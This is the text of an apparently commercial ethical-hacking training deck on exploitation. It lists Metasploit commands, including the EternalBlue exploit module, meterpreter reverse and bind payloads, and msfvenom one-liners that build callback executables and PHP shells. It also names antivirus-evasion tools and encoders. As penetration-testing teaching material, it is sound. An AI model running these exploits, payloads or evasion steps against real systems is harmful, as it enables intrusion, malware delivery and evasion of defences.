The document provides a comprehensive overview of exploitation techniques in cybersecurity, including types of exploits, exploit databases, and the usage of tools like the Metasploit framework. It covers various concepts such as payloads, exploit editing, and antivirus evasion strategies, while offering practical demonstrations for training purposes. Key features and commands related to Metasploit are detailed, aimed at equipping users with the knowledge to perform ethical hacking.

1. www.prismacsi.com
© All Rights Reserved.
1
Practical White Hat Hacker Training #5
Exploitation
This document may be quoted or shared, but cannot be modified or used for commercial purposes.
For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr

2. www.prismacsi.com
© All Rights Reserved.
2
Exploit Stage Topics
• What is an exploit?
• Types of exploits
• Local, remote and 0day exploits
• Exploit Databases
• Example Exploit Scenarios
• Exploit Execution and Usage Scenarios
• Exploit Frameworks
• Payload Concept
• Metasploit Framework
• Antivirus Evasion Software
• Veil-Evasion
• Shellter
• Application

3. www.prismacsi.com
© All Rights Reserved.
3
Basic Concepts
• What’s an exploit?
• The name given to tools developed to exploit a vulnerability.
• Also called exploitation code.
• Local Exploit
• Remote Exploit
• Web Exploit
• DoS Exploit
• 0day Exploit
• What’s a Payload?
• A piece of malicious code that performs a given desired action after an exploit

4. www.prismacsi.com
© All Rights Reserved.
4
Exploit Databases
• A holding container for a massive
number of exploits.
Discovered/detected software and
service exploits can be searched for
in these databases.
• Exploit-db.com
• Securityfocus.com
• 0day.today
• Exploits.shodan.io
• Iedb.ir
• Cxsecurity.com/exploit
• Rapid7.com/db

5. www.prismacsi.com
© All Rights Reserved.
5
Exploit Development Languages
• In which programming languages are exploits generally written?
• Python
• C / C++
• Perl
• PHP
• Ruby
• Why was the Framework concept conceived?
• Metasploit Framework example

6. www.prismacsi.com
© All Rights Reserved.
6
Exploit Execution / Use– Demo

7. www.prismacsi.com
© All Rights Reserved.
7
Exploit Editing
• Exploits don’t execute on every system.
• Parameters may vary according to features such as operating system, processor architecture,
system language.
• In this case you may need to edit the exploit and then execute it afterwards.
• Replicas of target system can be created in a laboratory environment for experiments.
• Assume you only have one chance to attack!
• A system crash may be the end of everything.

8. www.prismacsi.com
© All Rights Reserved.
8
Exploit Example - Scenario
• Consider a bank’s credit calculation area!
• Where is the calculation performed? ( Server? Client? )
• What if we perform the request specified in the scenario thousands of times within a minute?
• This is an example of a simple DoS ExploitJ

9. www.prismacsi.com
© All Rights Reserved.
9
Exploit Frameworks
• Metasploit Community
• Metasploit Pro
• Core Impact
• Exploithub
• BeEF

10. www.prismacsi.com
© All Rights Reserved.
10
Metasploit Framework
• Metasploit Framework
• Installation
• Basic Commands
• Auxiliary modules
• Exploit use
• Payload listi and Meterpreter use
• Output analysis
• Post Exploitation

11. www.prismacsi.com
© All Rights Reserved.
11
Metasploit Framework
• It’s an open source software.
• Pro version is available but the community
version will be sufficient for this course .
• Exploits
• Payloads
• Auxiliary modules
• Encoders
• Post exploits

12. www.prismacsi.com
© All Rights Reserved.
12
Metasploit Framework
• Visit the link below for installation instructions:
• https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
• Update:
• msfupdate

13. www.prismacsi.com
© All Rights Reserved.
13
Metasploit Framework

14. www.prismacsi.com
© All Rights Reserved.
14
Metasploit Framework
• Start
• Begin by typing msfconsole
in the command line.
• You can check the database status
with the following command:
• db_status

15. www.prismacsi.com
© All Rights Reserved.
15
Metasploit Framework
• Workspace concept
• Use the workspace to list all the
available workspaces.
• workspace -a prisma
creates a prisma workspace.
• workspace prisma
Switch to prisma workspace.
• workspace -d prisma
delete the prisma workspace.

16. www.prismacsi.com
© All Rights Reserved.
16
Metasploit Framework

17. www.prismacsi.com
© All Rights Reserved.
17
Metasploit Framework
• Working with Nessus, Nmap outputs
You can use the output of scanning software in integration with metasploit. This is one of the best features of
the Metasploit Framework.
• db_import nmap.xml
import nmap output.
• db_import nessus-report.nessus
import nessus output.
• db_export -f xml /tmp/prisma.xml
export the data in your workspace.

18. www.prismacsi.com
© All Rights Reserved.
18
Metasploit Framework

19. www.prismacsi.com
© All Rights Reserved.
19
Metasploit Framework

20. www.prismacsi.com
© All Rights Reserved.
20
Metasploit Framework
• Workspace data :
• hosts
• services
• creds
• loots

21. www.prismacsi.com
© All Rights Reserved.
21
Metasploit Framework
• Hosts command
• Db_nmap –sS –Pn –n 10.0.1.0/24
You can perform nmap scans with the command. host command can be used to view all IP addresses
discovered from the output of this command.
• hosts –h
You can access all the command functions with the above command
• hosts –R
Used to add addresses to the RHOST parameter.

22. www.prismacsi.com
© All Rights Reserved.
22
Metasploit Framework

23. www.prismacsi.com
© All Rights Reserved.
23
Metasploit Framework
• Services command
• db_nmap –sS –Pn –n 10.0.1.0/24 –sV
Used to execute an nmap scan. After the output of this command, you can view the ports on all IP
addresses and the services running on them with the services command.
• services –h .
You can access all the services command functions with the above command
• services –p 445
• services –S http
• services –p 80 -R

24. www.prismacsi.com
© All Rights Reserved.
24
Metasploit Framework

25. www.prismacsi.com
© All Rights Reserved.
25
Metasploit Basic Command List
• help
• Help command
• banner
• Allows you to take awesome screenshotsJ
• info
• Get information on any plugin
• info exploit/windows/smb/psexec
• search
• Search command
• search ms17-010

26. www.prismacsi.com
© All Rights Reserved.
26
Metasploit Basic Command List
• use
• Select an exploit
• use exploit/windows/smb/psexec
• set
• Exploit
• info
• Acquire information on any plugin
• info exploit/windows/smb/psexec
• search
• Search command
• search ms17-010

27. www.prismacsi.com
© All Rights Reserved.
27
Metasploit Framework - Help

28. www.prismacsi.com
© All Rights Reserved.
28
Metasploit Framework - Banner

29. www.prismacsi.com
© All Rights Reserved.
29
Metasploit Framework - Info

30. www.prismacsi.com
© All Rights Reserved.
30
Metasploit Basic Command List
• set
• Used to assign values to a parameter.
• set RHOST 10.0.1.5
• setg
• Used to assign a parameter value as global.
• unset
• Used to reset parameter values.
• show
• Show namesJ
• use
• Activates a plugin.

31. www.prismacsi.com
© All Rights Reserved.
31
Metasploit Basic Command List
• run and exploit
• Used to run a plugin.
• load and unload
• Used to activate or deactivate a module.
• exit
• Exiting command

32. www.prismacsi.com
© All Rights Reserved.
32
Metasploit Show Command
• show payloads
• List Payloads
• show targets
• List operating systems suitable for attacks with a given plugin
• show options
• Show setting parameters for a plugin
• show encoders
• List all encoders

33. www.prismacsi.com
© All Rights Reserved.
33
Auxillary Modules and Use
• show auxillary
• search smb_login
• use auxillary/dos/windows/rdp/ms12_020
• set RHOST
• set RPORT
• run

34. www.prismacsi.com
© All Rights Reserved.
34
Exploit Attempt (MS17-010)
• search netapi
• info exploit/windows/smb/ms17_010_eternalblue
• use exploit/windows/smb/ms17_010_eternalblue
• show options
• set payload windows/meterpreter/bind_tcp
• set LHOST,
• set RHOST
• set RPORT
• exploit

35. www.prismacsi.com
© All Rights Reserved.
35
Payload Examples
• set PAYLOAD windows/meterpreter/reverse_http
• set PAYLOAD windows/shell/bind_tcp
• set PAYLOAD linux/x86/meterpreter/reverse_https
• set PAYLOAD php/meterpreter/bind_tcp
• set PAYLOAD java/meterpreter/bind_tcp
• set PAYLOAD /windows/vncinject/reverse_tcp

36. www.prismacsi.com
© All Rights Reserved.
36
Reverse/Bind Shell

37. www.prismacsi.com
© All Rights Reserved.
37
Session Management
• exploit/multi/handler
• Can be used as a listener.
• Listener can be run as a job to get connections from multiple targets.
• jobs :
• exploit –j
• jobs command is used for listing jobs.

38. www.prismacsi.com
© All Rights Reserved.
38
Session Management
• You can manage all sessions obtained with the sessions command.
• sessions –l : list sessions
• session –i 1 : 1. Interact with session
• sessions –K : end all sessions
• sessions –u : upgrade a session to meterpreter session
• kill : used to kill a session.
• background : takes the session into the background and returns to the metasploit console.

39. www.prismacsi.com
© All Rights Reserved.
39
Exploit Search
• Searchsploit

40. www.prismacsi.com
© All Rights Reserved.
40
What’s Msfvenom?
• There may be no direct vulnerability in the target system.
• In this case, it may be necessary to try to penetrate the system in different ways.
• For example if a created malicious .exe file is somehow successfully uploaded and executed on a system then
the system can be captured.
• Or you might want to upload a malicious shell written in php on to a web application with a file upload
vulnerability and get a terminal connection on metasploit.
• That's where msfvenom comes into play!

41. www.prismacsi.com
© All Rights Reserved.
41
Msfvenom Use
• Msfvenom basic commands
• msfvenom -h
• msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337-f exe > shell.exe
• msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.10. lport=4444 -f raw > exp.php
• msfvenom - p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f war -a x86

42. www.prismacsi.com
© All Rights Reserved.
42
Msfvenom AV Evasion- Demonstration
• msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -e x86/shikata_ga_nai -i 15
-f exe -o shell.exe

43. www.prismacsi.com
© All Rights Reserved.
43
Msfvenom Help

44. www.prismacsi.com
© All Rights Reserved.
44
Msfvenom PHP Payload Contents

45. www.prismacsi.com
© All Rights Reserved.
45
Download Metasploit Additional Plugins
• https://github.com/darkoperator/Metasploit-Plugins

46. www.prismacsi.com
© All Rights Reserved.
46
Loading Metasploit Features
• Files are added manually under ~/.msf4/plugin/

47. www.prismacsi.com
© All Rights Reserved.
47
Armitage Use
• Metasploit Framework GUI
• Used to perform actions quickly
• The interface is a little easier to use compared to the console application

48. www.prismacsi.com
© All Rights Reserved.
48
Armitage Use
• Adding a host

49. www.prismacsi.com
© All Rights Reserved.
49
Armitage Use
• Host scanning

50. www.prismacsi.com
© All Rights Reserved.
50
Armitage Use
• Scan Results

51. www.prismacsi.com
© All Rights Reserved.
51
Armitage Use
• Finding an attack vector

52. www.prismacsi.com
© All Rights Reserved.
52
Armitage Use
• Java_rmi_attack

53. www.prismacsi.com
© All Rights Reserved.
53
Armitage Use
• Java_rmi_attack
• Meterpreter session

54. www.prismacsi.com
© All Rights Reserved.
54
Antivirus Evasion Tools
• An antivirus mechanism may be found in target systems.
• In this case the attacks should be performed with much more caution.
• There are tools developed to bypass antiviruses.
• Used tools
• Veil-Evasion
• Shellter
• Av0id
• Msfvenom

55. www.prismacsi.com
© All Rights Reserved.
55
Veil-Evasion Installation

56. www.prismacsi.com
© All Rights Reserved.
56
Veil-Evasion Payload Selection

57. www.prismacsi.com
© All Rights Reserved.
57
Veil-Evasion Payload Configuration

58. www.prismacsi.com
© All Rights Reserved.
58
Veil-Evasion Payload Creation - DEMO

59. www.prismacsi.com
© All Rights Reserved.
59
Virustotal Scanning

60. www.prismacsi.com
© All Rights Reserved.
60
Shellter Installation

61. www.prismacsi.com
© All Rights Reserved.
61
Shellter Use – DEMO

62. www.prismacsi.com
© All Rights Reserved.
62
Virustotal Scanning

63. www.prismacsi.com
© All Rights Reserved.
63
Applications

64. www.prismacsi.com
© All Rights Reserved.
64
Questions?

65. www.prismacsi.com
© All Rights Reserved.
65
www.prismacsi.com
info@prismacsi.com
0 850 303 85 35
/prismacsi
Contacts